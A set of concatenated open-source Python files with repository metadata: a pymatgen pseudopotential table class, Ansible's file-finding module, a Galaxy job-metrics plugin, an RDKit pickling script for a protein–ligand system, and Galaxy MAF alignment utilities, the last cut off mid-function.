#def plot_potentials(self, **kwargs):
# """
# ================ ==============================================================
# kwargs Meaning
# ================ ==============================================================
# title Title of the plot (Default: None).
# show True to show the figure (Default).
# savefig 'abc.png' or 'abc.eps' to save the figure to a file.
# ================ ==============================================================
# Returns:
# `matplotlib` figure
# """
# title = kwargs.pop("title", "Potentials")
# show = kwargs.pop("show", True)
# savefig = kwargs.pop("savefig", None)
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax = fig.add_subplot(1,1,1)
# ax.grid(True)
# ax.set_xlabel('r [Bohr]')
# ax.set_ylabel('density')
# ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
# ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
# for state, rfunc in self.potentials.items():
# ax.plot(rfunc.mesh, rfunc.values, label="TPROJ: " + state)
# ax.legend(loc="best")
# if title is not None: fig.suptitle(title)
# if show: plt.show()
# if savefig: fig.savefig(savefig)
# return fig
class PseudoTable(collections.abc.Sequence, MSONable, metaclass=abc.ABCMeta):
"""
Define the pseudopotentials from the element table.
Individidual elements are accessed by name, symbol or atomic number.
For example, the following all retrieve iron:
print elements[26]
Fe
print elements.Fe
Fe
print elements.symbol('Fe')
Fe
print elements.name('iron')
Fe
print elements.isotope('Fe')
Fe
"""
@classmethod
def as_table(cls, items):
"""
Return an instance of :class:`PseudoTable` from the iterable items.
"""
if isinstance(items, cls): return items
return cls(items)
@classmethod
def from_dir(cls, top, exts=None, exclude_dirs="_*"):
"""
Find all pseudos in the directory tree starting from top.
Args:
top: Top of the directory tree
exts: List of files extensions. if exts == "all_files"
we try to open all files in top
exclude_dirs: Wildcard used to exclude directories.
return: :class:`PseudoTable` sorted by atomic number Z.
"""
pseudos = []
if exts == "all_files":
for f in [os.path.join(top, fn) for fn in os.listdir(top)]:
if os.path.isfile(f):
try:
p = Pseudo.from_file(f)
if p:
pseudos.append(p)
else:
logger.info('Skipping file %s' % f)
except:
logger.info('Skipping file %s' % f)
if not pseudos:
logger.warning('No pseudopotentials parsed from folder %s' % top)
return None
logger.info('Creating PseudoTable with %i pseudopotentials' % len(pseudos))
else:
if exts is None: exts=("psp8",)
for p in find_exts(top, exts, exclude_dirs=exclude_dirs):
try:
pseudos.append(Pseudo.from_file(p))
except Exception as exc:
logger.critical("Error in %s:\n%s" % (p, exc))
return cls(pseudos).sort_by_z()
def __init__(self, pseudos):
"""
Args:
pseudos: List of pseudopotentials or filepaths
"""
# Store pseudos in a default dictionary with z as key.
# Note that we can have more than one pseudo for given z.
# hence the values are lists of pseudos.
if not isinstance(pseudos, collections.abc.Iterable):
pseudos = [pseudos]
if len(pseudos) and is_string(pseudos[0]):
pseudos = list_strings(pseudos)
self._pseudos_with_z = defaultdict(list)
for pseudo in pseudos:
if not isinstance(pseudo, Pseudo):
pseudo = Pseudo.from_file(pseudo)
if pseudo is not None:
self._pseudos_with_z[pseudo.Z].append(pseudo)
for z in self.zlist:
pseudo_list = self._pseudos_with_z[z]
symbols = [p.symbol for p in pseudo_list]
symbol = symbols[0]
if any(symb != symbol for symb in symbols):
raise ValueError("All symbols must be equal while they are: %s" % str(symbols))
setattr(self, symbol, pseudo_list)
def __getitem__(self, Z):
"""
Retrieve pseudos for the atomic number z. Accepts both int and slice objects.
"""
if isinstance(Z, slice):
assert Z.stop is not None
pseudos = []
for znum in iterator_from_slice(Z):
pseudos.extend(self._pseudos_with_z[znum])
return self.__class__(pseudos)
else:
return self.__class__(self._pseudos_with_z[Z])
def __len__(self):
return len(list(self.__iter__()))
def __iter__(self):
"""Process the elements in Z order."""
for z in self.zlist:
for pseudo in self._pseudos_with_z[z]:
yield pseudo
def __repr__(self):
return "<%s at %s>" % (self.__class__.__name__, id(self))
def __str__(self):
return self.to_table()
@property
def allnc(self):
"""True if all pseudos are norm-conserving."""
return all(p.isnc for p in self)
@property
def allpaw(self):
"""True if all pseudos are PAW."""
return all(p.ispaw for p in self)
@property
def zlist(self):
"""Ordered list with the atomic numbers available in the table."""
return sorted(list(self._pseudos_with_z.keys()))
#def max_ecut_pawecutdg(self, accuracy):
#"""Return the maximum value of ecut and pawecutdg based on the hints available in the pseudos."""
# ecut = max(p.hint_for_accuracy(accuracy=accuracy).ecut for p in self)
# pawecutdg = max(p.hint_for_accuracy(accuracy=accuracy).pawecutdg for p in self)
# return ecut, pawecutdg
def as_dict(self, **kwargs):
d = {}
for p in self:
k, count = p.element.name, 1
# k, count = p.element, 1
# Handle multiple-pseudos with the same name!
while k in d:
k += k.split("#")[0] + "#" + str(count)
count += 1
d.update({k: p.as_dict()})
d['@module'] = self.__class__.__module__
d['@class'] = self.__class__.__name__
return d
@classmethod
def from_dict(cls, d):
pseudos = []
dec = MontyDecoder()
for k, v in d.items():
if not k.startswith('@'):
pseudos.append(dec.process_decoded(v))
return cls(pseudos)
def is_complete(self, zmax=118):
"""
True if table is complete i.e. all elements with Z < zmax have at least on pseudopotential
"""
for z in range(1, zmax):
if not self[z]: return False
return True
def all_combinations_for_elements(self, element_symbols):
"""
Return a list with all the the possible combination of pseudos
for the given list of element_symbols.
Each item is a list of pseudopotential objects.
Example::
table.all_combinations_for_elements(["Li", "F"])
"""
d = OrderedDict()
for symbol in element_symbols:
d[symbol] = self.select_symbols(symbol, ret_list=True)
from itertools import product
return list(product(*d.values()))
def pseudo_with_symbol(self, symbol, allow_multi=False):
"""
Return the pseudo with the given chemical symbol.
Args:
symbols: String with the chemical symbol of the element
allow_multi: By default, the method raises ValueError
if multiple occurrences are found. Use allow_multi to prevent this.
Raises:
ValueError if symbol is not found or multiple occurences are present and not allow_multi
"""
pseudos = self.select_symbols(symbol, ret_list=True)
if not pseudos or (len(pseudos) > 1 and not allow_multi):
raise ValueError("Found %d occurrences of symbol %s" % (len(pseudos), symbol))
if not allow_multi:
return pseudos[0]
else:
return pseudos
def pseudos_with_symbols(self, symbols):
"""
Return the pseudos with the given chemical symbols.
Raises:
ValueError if one of the symbols is not found or multiple occurences are present.
"""
pseudos = self.select_symbols(symbols, ret_list=True)
found_symbols = [p.symbol for p in pseudos]
duplicated_elements = [s for s, o in collections.Counter(found_symbols).items() if o > 1]
if duplicated_elements:
raise ValueError("Found multiple occurrences of symbol(s) %s" % ', '.join(duplicated_elements))
missing_symbols = [s for s in symbols if s not in found_symbols]
if missing_symbols:
raise ValueError("Missing data for symbol(s) %s" % ', '.join(missing_symbols))
return pseudos
def select_symbols(self, symbols, ret_list=False):
"""
Return a :class:`PseudoTable` with the pseudopotentials with the given list of chemical symbols.
Args:
symbols: str or list of symbols
Prepend the symbol string with "-", to exclude pseudos.
ret_list: if True a list of pseudos is returned instead of a :class:`PseudoTable`
"""
symbols = list_strings(symbols)
exclude = symbols[0].startswith("-")
if exclude:
if not all(s.startswith("-") for s in symbols):
raise ValueError("When excluding symbols, all strings must start with `-`")
symbols = [s[1:] for s in symbols]
symbols = set(symbols)
pseudos = []
for p in self:
if exclude:
if p.symbol in symbols: continue
else:
if p.symbol not in symbols: continue
pseudos.append(p)
if ret_list:
return pseudos
else:
return self.__class__(pseudos)
def get_pseudos_for_structure(self, structure):
"""
Return the list of :class:`Pseudo` objects to be used for this :class:`Structure`.
Args:
structure: pymatgen :class:`Structure`.
Raises:
`ValueError` if one of the chemical symbols is not found or
multiple occurences are present in the table.
"""
return self.pseudos_with_symbols(structure.symbol_set)
def print_table(self, stream=sys.stdout, filter_function=None):
"""
A pretty ASCII printer for the periodic table, based on some filter_function.
Args:
stream: file-like object
filter_function:
A filtering function that take a Pseudo as input and returns a boolean.
For example, setting filter_function = lambda p: p.Z_val > 2 will print
a periodic table containing only pseudos with Z_val > 2.
"""
print(self.to_table(filter_function=filter_function), file=stream)
def to_table(self, filter_function=None):
"""Return string with data in tabular form."""
table = []
for p in self:
if filter_function is not None and filter_function(p): continue
table.append([p.basename, p.symbol, p.Z_val, p.l_max, p.l_local, p.xc, p.type])
return tabulate(table, headers= ["basename", "symbol", "Z_val", "l_max", "l_local", "XC", "type"],
tablefmt="grid")
def sorted(self, attrname, reverse=False):
"""
Sort the table according to the value of attribute attrname.
Return:
New class:`PseudoTable` object
"""
attrs = []
for i, pseudo in self:
try:
a = getattr(pseudo, attrname)
except AttributeError:
a = np.inf
attrs.append((i, a))
# Sort attrs, and build new table with sorted pseudos.
return self.__class__([self[a[0]] for a in sorted(attrs, key=lambda t: t[1], reverse=reverse)])
def sort_by_z(self):
"""Return a new :class:`PseudoTable` with pseudos sorted by Z"""
return self.__class__(sorted(self, key=lambda p: p.Z))
def select(self, condition):
"""
Select only those pseudopotentials for which condition is True.
Return new class:`PseudoTable` object.
Args:
condition:
Function that accepts a :class:`Pseudo` object and returns True or False.
"""
return self.__class__([p for p in self if condition(p)])
def with_dojo_report(self):
"""Select pseudos containing the DOJO_REPORT section. Return new class:`PseudoTable` object."""
return self.select(condition=lambda p: p.has_dojo_report)
def select_rows(self, rows):
"""
Return new class:`PseudoTable` object with pseudos in the given rows of the periodic table.
rows can be either a int or a list of integers.
"""
if not isinstance(rows, (list, tuple)): rows = [rows]
return self.__class__([p for p in self if p.element.row in rows])
def select_family(self, family):
# e.g element.is_alkaline
return self.__class__([p for p in self if getattr(p.element, "is_" + family)])
|
montoyjh/pymatgen
|
pymatgen/io/abinit/pseudos.py
|
Python
|
mit
| 63,324
|
[
"ABINIT",
"pymatgen"
] |
f44d7eac1a680462eac59039b1cc22f51ad78c8f365fad0f04a2212b6420fe80
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Ruggero Marchei <ruggero.marchei@daemonzone.net>
# Copyright: (c) 2015, Brian Coca <bcoca@ansible.com>
# Copyright: (c) 2016-2017, Konstantin Shalygin <k0ste@k0ste.ru>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: Return a list of files based on specific criteria
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
- For Windows targets, use the M(win_find) module instead.
options:
age:
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
default: '*'
description:
- One or more (shell or regex) patterns, which type is controlled by C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
excludes:
default: null
description:
- One or more (shell or regex) patterns, which type is controlled by C(use_regex) option.
- Excludes is a patterns should not be returned in list. Multiple patterns can be specified
using a list.
aliases: ['exclude']
version_added: "2.5"
contains:
description:
- One or more regex patterns which should be matched against the file content.
paths:
required: true
aliases: [ name, path ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
description:
- Type of file to select.
- The 'link' and 'any' choices were added in version 2.3.
choices: [ any, directory, file, link ]
default: file
recurse:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
default: mtime
choices: [ atime, ctime, mtime ]
description:
- Choose the file property against which we compare age.
hidden:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+.
get_checksum:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to retrieve a file's sha1 checksum.
use_regex:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- If false the patterns are file globs (shell) if true they are python regexes.
depth:
required: false
default: null
description:
- Set the maximum number of levels to decend into. Setting recurse
to false will override this value, which is effectively depth 1.
Default is unlimited depth.
version_added: "2.6"
notes:
- For Windows targets, use the M(win_find) module instead.
'''
EXAMPLES = r'''
- name: Recursively find /tmp files older than 2 days
find:
paths: /tmp
age: 2d
recurse: yes
- name: Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
find:
paths: /tmp
age: 4w
size: 1m
recurse: yes
- name: Recursively find /var/tmp files with last access time greater than 3600 seconds
find:
paths: /var/tmp
age: 3600
age_stamp: atime
recurse: yes
- name: Find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
find:
paths: /var/log
patterns: '*.old,*.log.gz'
size: 10m
# Note that YAML double quotes require escaping backslashes but yaml single quotes do not.
- name: Find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
find:
paths: /var/log
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: 10m
use_regex: yes
- name: Find /var/log all directories, exclude nginx and mysql
find:
paths: /var/log
recurse: no
file_type: directory
excludes: 'nginx,mysql'
'''
RETURN = r'''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
type: string
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
type: string
sample: 34
'''
import fnmatch
import grp
import os
import pwd
import re
import stat
import sys
import time
from ansible.module_utils.basic import AnsibleModule
def pfilter(f, patterns=None, excludes=None, use_regex=False):
'''filter using glob patterns'''
if patterns is None and excludes is None:
return True
if use_regex:
if patterns and excludes is None:
for p in patterns:
r = re.compile(p)
if r.match(f):
return True
elif patterns and excludes:
for p in patterns:
r = re.compile(p)
if r.match(f):
for e in excludes:
r = re.compile(e)
if r.match(f):
return False
return True
else:
if patterns and excludes is None:
for p in patterns:
if fnmatch.fnmatch(f, p):
return True
elif patterns and excludes:
for p in patterns:
if fnmatch.fnmatch(f, p):
for e in excludes:
if fnmatch.fnmatch(f, e):
return False
return True
return False
def agefilter(st, now, age, timestamp):
'''filter files older than age'''
if age is None:
return True
elif age >= 0 and now - st.__getattribute__("st_%s" % timestamp) >= abs(age):
return True
elif age < 0 and now - st.__getattribute__("st_%s" % timestamp) <= abs(age):
return True
return False
def sizefilter(st, size):
'''filter files greater than size'''
if size is None:
return True
elif size >= 0 and st.st_size >= abs(size):
return True
elif size < 0 and st.st_size <= abs(size):
return True
return False
def contentfilter(fsname, pattern):
'''filter files which contain the given expression'''
if pattern is None:
return True
try:
f = open(fsname)
prog = re.compile(pattern)
for line in f:
if prog.match(line):
f.close()
return True
f.close()
except:
pass
return False
def statinfo(st):
pw_name = ""
gr_name = ""
try: # user data
pw_name = pwd.getpwuid(st.st_uid).pw_name
except:
pass
try: # group data
gr_name = grp.getgrgid(st.st_gid).gr_name
except:
pass
return {
'mode': "%04o" % stat.S_IMODE(st.st_mode),
'isdir': stat.S_ISDIR(st.st_mode),
'ischr': stat.S_ISCHR(st.st_mode),
'isblk': stat.S_ISBLK(st.st_mode),
'isreg': stat.S_ISREG(st.st_mode),
'isfifo': stat.S_ISFIFO(st.st_mode),
'islnk': stat.S_ISLNK(st.st_mode),
'issock': stat.S_ISSOCK(st.st_mode),
'uid': st.st_uid,
'gid': st.st_gid,
'size': st.st_size,
'inode': st.st_ino,
'dev': st.st_dev,
'nlink': st.st_nlink,
'atime': st.st_atime,
'mtime': st.st_mtime,
'ctime': st.st_ctime,
'gr_name': gr_name,
'pw_name': pw_name,
'wusr': bool(st.st_mode & stat.S_IWUSR),
'rusr': bool(st.st_mode & stat.S_IRUSR),
'xusr': bool(st.st_mode & stat.S_IXUSR),
'wgrp': bool(st.st_mode & stat.S_IWGRP),
'rgrp': bool(st.st_mode & stat.S_IRGRP),
'xgrp': bool(st.st_mode & stat.S_IXGRP),
'woth': bool(st.st_mode & stat.S_IWOTH),
'roth': bool(st.st_mode & stat.S_IROTH),
'xoth': bool(st.st_mode & stat.S_IXOTH),
'isuid': bool(st.st_mode & stat.S_ISUID),
'isgid': bool(st.st_mode & stat.S_ISGID),
}
def main():
module = AnsibleModule(
argument_spec=dict(
paths=dict(type='list', required=True, aliases=['name', 'path']),
patterns=dict(type='list', default=['*'], aliases=['pattern']),
excludes=dict(type='list', aliases=['exclude']),
contains=dict(type='str'),
file_type=dict(type='str', default="file", choices=['any', 'directory', 'file', 'link']),
age=dict(type='str'),
age_stamp=dict(type='str', default="mtime", choices=['atime', 'mtime', 'ctime']),
size=dict(type='str'),
recurse=dict(type='bool', default='no'),
hidden=dict(type='bool', default='no'),
follow=dict(type='bool', default='no'),
get_checksum=dict(type='bool', default='no'),
use_regex=dict(type='bool', default='no'),
depth=dict(type='int', default=None),
),
supports_check_mode=True,
)
params = module.params
filelist = []
if params['age'] is None:
age = None
else:
# convert age to seconds:
m = re.match(r"^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
if m:
age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
else:
module.fail_json(age=params['age'], msg="failed to process age")
if params['size'] is None:
size = None
else:
# convert size to bytes:
m = re.match(r"^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
if m:
size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
else:
module.fail_json(size=params['size'], msg="failed to process size")
now = time.time()
msg = ''
looked = 0
for npath in params['paths']:
npath = os.path.expanduser(os.path.expandvars(npath))
if os.path.isdir(npath):
''' ignore followlinks for python version < 2.6 '''
for root, dirs, files in (sys.version_info < (2, 6, 0) and os.walk(npath)) or os.walk(npath, followlinks=params['follow']):
if params['depth']:
depth = root.replace(npath.rstrip(os.path.sep), '').count(os.path.sep)
if files or dirs:
depth += 1
if depth > params['depth']:
del(dirs[:])
continue
looked = looked + len(files) + len(dirs)
for fsobj in (files + dirs):
fsname = os.path.normpath(os.path.join(root, fsobj))
if os.path.basename(fsname).startswith('.') and not params['hidden']:
continue
try:
st = os.lstat(fsname)
except:
msg += "%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
continue
r = {'path': fsname}
if params['file_type'] == 'any':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and \
agefilter(st, now, age, params['age_stamp']) and \
sizefilter(st, size) and contentfilter(fsname, params['contains']):
r.update(statinfo(st))
if params['get_checksum']:
r['checksum'] = module.sha1(fsname)
filelist.append(r)
elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
if not params['recurse']:
break
else:
msg += "%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath
matched = len(filelist)
module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
if __name__ == '__main__':
main()
|
rahushen/ansible
|
lib/ansible/modules/files/find.py
|
Python
|
gpl-3.0
| 14,992
|
[
"Brian"
] |
a000232998a2cbab5ae2ece55c4d7b0a541be10d0621047ab85f56efe3dd46db
|
from ..instrumenters import InstrumentPlugin
from ...metrics import formatting
import time
import logging
log = logging.getLogger( __name__ )
GALAXY_SLOTS_KEY = "galaxy_slots"
START_EPOCH_KEY = "start_epoch"
END_EPOCH_KEY = "end_epoch"
RUNTIME_SECONDS_KEY = "runtime_seconds"
class CorePluginFormatter( formatting.JobMetricFormatter ):
def format( self, key, value ):
value = int( value )
if key == GALAXY_SLOTS_KEY:
return ( "Cores Allocated", "%d" % value )
elif key == RUNTIME_SECONDS_KEY:
return ( "Job Runtime (Wall Clock)", formatting.seconds_to_str( value ) )
else:
# TODO: Use localized version of this from universe_wsgi.ini
title = "Job Start Time" if key == START_EPOCH_KEY else "Job End Time"
return (title, time.strftime( '%Y-%m-%d %H:%M:%S', time.localtime( value ) ) )
class CorePlugin( InstrumentPlugin ):
""" Simple plugin that collects data without external dependencies. In
particular it currently collects value set for Galaxy slots.
"""
plugin_type = "core"
formatter = CorePluginFormatter()
def __init__( self, **kwargs ):
pass
def pre_execute_instrument( self, job_directory ):
commands = []
commands.append( self.__record_galaxy_slots_command( job_directory ) )
commands.append( self.__record_seconds_since_epoch_to_file( job_directory, "start" ) )
return commands
def post_execute_instrument( self, job_directory ):
commands = []
commands.append( self.__record_seconds_since_epoch_to_file( job_directory, "end" ) )
return commands
def job_properties( self, job_id, job_directory ):
galaxy_slots_file = self.__galaxy_slots_file( job_directory )
properties = {}
properties[ GALAXY_SLOTS_KEY ] = self.__read_integer( galaxy_slots_file )
start = self.__read_seconds_since_epoch( job_directory, "start" )
end = self.__read_seconds_since_epoch( job_directory, "end" )
if start is not None and end is not None:
properties[ START_EPOCH_KEY ] = start
properties[ END_EPOCH_KEY ] = end
properties[ RUNTIME_SECONDS_KEY ] = end - start
return properties
def __record_galaxy_slots_command( self, job_directory ):
galaxy_slots_file = self.__galaxy_slots_file( job_directory )
return '''echo "$GALAXY_SLOTS" > '%s' ''' % galaxy_slots_file
def __record_seconds_since_epoch_to_file( self, job_directory, name ):
path = self._instrument_file_path( job_directory, "epoch_%s" % name )
return 'date +"%s" > ' + path
def __read_seconds_since_epoch( self, job_directory, name ):
path = self._instrument_file_path( job_directory, "epoch_%s" % name )
return self.__read_integer( path )
def __galaxy_slots_file( self, job_directory ):
return self._instrument_file_path( job_directory, "galaxy_slots" )
def __read_integer( self, path ):
value = None
try:
value = int( open( path, "r" ).read() )
except Exception:
pass
return value
__all__ = [ CorePlugin ]
|
jmchilton/lwr
|
galaxy/jobs/metrics/instrumenters/core.py
|
Python
|
apache-2.0
| 3,192
|
[
"Galaxy"
] |
1ceb63fe46c7c63902396fd548310d38b5fad8c3150938ad188379465c516286
|
class ObjectVisitor(object):
def visit_objects(self, objects):
for tag, obj in objects.iteritems():
self.visit(obj)
def generic_visit(self, obj):
pass
def visit(self, obj):
visitor_name = 'visit_%s' % obj['class']
return getattr(self, visitor_name, self.generic_visit)(obj)
|
fredreichbier/babbisch
|
babbisch/client.py
|
Python
|
mit
| 332
|
[
"VisIt"
] |
b6d52e013130c62caca1e686883de75f53380c0ff545cab0c370f6f90be17f1d
|
import pickle
import os.path as osp
import numpy as np
from rdkit import Chem
inputs_path = osp.realpath("../../examples/sEH-TPPU")
TPPU_MOL_path = osp.join(inputs_path, "TPPU.mol")
TPPU_MOL_rdkit = Chem.MolFromMolFile(TPPU_MOL_path, sanitize=True)
TPPU_PDB_path = osp.join(inputs_path, "TPPU.pdb")
TPPU_PDB_rdkit = Chem.MolFromPDBFile(TPPU_PDB_path, removeHs=False, sanitize=False)
seh_PDB_path = osp.join(inputs_path, "sEH.pdb")
seh_rdkit = Chem.MolFromPDBFile(seh_PDB_path, removeHs=False, sanitize=False)
from mastic.interfaces.rdkit import AssignBondOrdersFromTemplate
TPPU_rdkit = AssignBondOrdersFromTemplate(TPPU_MOL_rdkit, TPPU_PDB_rdkit)
from mastic.interfaces.rdkit import RDKitMoleculeWrapper
TPPU_rdkit_wrapper = RDKitMoleculeWrapper(TPPU_rdkit, mol_name="TPPU")
seh_rdkit_wrapper = RDKitMoleculeWrapper(seh_rdkit, mol_name="sEH")
TPPU_coords = TPPU_rdkit_wrapper.get_conformer_coords(0)
seh_coords = seh_rdkit_wrapper.get_conformer_coords(0)
member_coords = [TPPU_coords, seh_coords]
# pickle everything
TPPU_rdkit_pkl_path = osp.join(".", "TPPU_rdkit.pkl")
seh_rdkit_pkl_path = osp.join(".", "sEH_rdkit.pkl")
TPPU_coords_path = osp.join(".", "TPPU.npy")
seh_coords_path = osp.join(".", "sEH.npy")
with open(TPPU_rdkit_pkl_path, 'wb') as wf:
pickle.dump(TPPU_rdkit_wrapper, wf)
with open(seh_rdkit_pkl_path, 'wb') as wf:
pickle.dump(seh_rdkit_wrapper, wf)
np.save(TPPU_coords_path, TPPU_coords)
np.save(seh_coords_path, seh_coords)
|
salotz/mast
|
prototypes/profile_system/make_pkls.py
|
Python
|
mit
| 1,463
|
[
"RDKit"
] |
beb1af1da0eec98c2c41afcf55ca24435cf1bd584d415ca19de85bcee802af0d
|
#!/usr/bin/env python
"""
Provides wrappers and utilities for working with MAF files and alignments.
"""
#Dan Blankenberg
import pkg_resources; pkg_resources.require( "bx-python" )
import bx.align.maf
import bx.intervals
import bx.interval_index_file
import sys, os, string, tempfile
import logging
from copy import deepcopy
assert sys.version_info[:2] >= ( 2, 4 )
log = logging.getLogger(__name__)
GAP_CHARS = [ '-' ]
SRC_SPLIT_CHAR = '.'
def src_split( src ):
fields = src.split( SRC_SPLIT_CHAR, 1 )
spec = fields.pop( 0 )
if fields:
chrom = fields.pop( 0 )
else:
chrom = spec
return spec, chrom
def src_merge( spec, chrom, contig = None ):
if None in [ spec, chrom ]:
spec = chrom = spec or chrom
return bx.align.maf.src_merge( spec, chrom, contig )
def get_species_in_block( block ):
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in species:
species.append( spec )
return species
def tool_fail( msg = "Unknown Error" ):
print >> sys.stderr, "Fatal Error: %s" % msg
sys.exit()
#an object corresponding to a reference layered alignment
class RegionAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
MAX_SEQUENCE_SIZE = sys.maxint #Maximum length of sequence allowed
def __init__( self, size, species = [] ):
assert size <= self.MAX_SEQUENCE_SIZE, "Maximum length allowed for an individual sequence has been exceeded (%i > %i)." % ( size, self.MAX_SEQUENCE_SIZE )
self.size = size
self.sequences = {}
if not isinstance( species, list ):
species = [species]
for spec in species:
self.add_species( spec )
#add a species to the alignment
def add_species( self, species ):
#make temporary sequence files
self.sequences[species] = tempfile.TemporaryFile()
self.sequences[species].write( "-" * self.size )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = self.sequences.keys()
for name in skip:
try: names.remove( name )
except: pass
return names
#returns the sequence for a species
def get_sequence( self, species ):
self.sequences[species].seek( 0 )
return self.sequences[species].read()
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#sets a position for a species
def set_position( self, index, species, base ):
if len( base ) != 1: raise Exception( "A genomic position can only have a length of 1." )
return self.set_range( index, species, base )
#sets a range for a species
def set_range( self, index, species, bases ):
if index >= self.size or index < 0: raise Exception( "Your index (%i) is out of range (0 - %i)." % ( index, self.size - 1 ) )
if len( bases ) == 0: raise Exception( "A set of genomic positions can only have a positive length." )
if species not in self.sequences.keys(): self.add_species( species )
self.sequences[species].seek( index )
self.sequences[species].write( bases )
#Flush temp file of specified species, or all species
def flush( self, species = None ):
if species is None:
species = self.sequences.keys()
elif not isinstance( species, list ):
species = [species]
for spec in species:
self.sequences[spec].flush()
class GenomicRegionAlignment( RegionAlignment ):
def __init__( self, start, end, species = [] ):
RegionAlignment.__init__( self, end - start, species )
self.start = start
self.end = end
class SplicedAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
def __init__( self, exon_starts, exon_ends, species = [] ):
if not isinstance( exon_starts, list ):
exon_starts = [exon_starts]
if not isinstance( exon_ends, list ):
exon_ends = [exon_ends]
assert len( exon_starts ) == len( exon_ends ), "The number of starts does not match the number of sizes."
self.exons = []
for i in range( len( exon_starts ) ):
self.exons.append( GenomicRegionAlignment( exon_starts[i], exon_ends[i], species ) )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = []
for exon in self.exons:
for name in exon.get_species_names( skip = skip ):
if name not in names:
names.append( name )
return names
#returns the sequence for a species
def get_sequence( self, species ):
sequence = tempfile.TemporaryFile()
for exon in self.exons:
if species in exon.get_species_names():
sequence.write( exon.get_sequence( species ) )
else:
sequence.write( "-" * exon.size )
sequence.seek( 0 )
return sequence.read()
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#Start and end of coding region
@property
def start( self ):
return self.exons[0].start
@property
def end( self ):
return self.exons[-1].end
#Open a MAF index using a UID
def maf_index_by_uid( maf_uid, index_location_file ):
for line in open( index_location_file ):
try:
#read each line, if not enough fields, go to next line
if line[0:1] == "#" : continue
fields = line.split('\t')
if maf_uid == fields[1]:
try:
maf_files = fields[4].replace( "\n", "" ).replace( "\r", "" ).split( "," )
return bx.align.maf.MultiIndexed( maf_files, keep_open = True, parse_e_rows = False )
except Exception, e:
raise Exception( 'MAF UID (%s) found, but configuration appears to be malformed: %s' % ( maf_uid, e ) )
except:
pass
return None
#return ( index, temp_index_filename ) for user maf, if available, or build one and return it, return None when no tempfile is created
def open_or_build_maf_index( maf_file, index_filename, species = None ):
try:
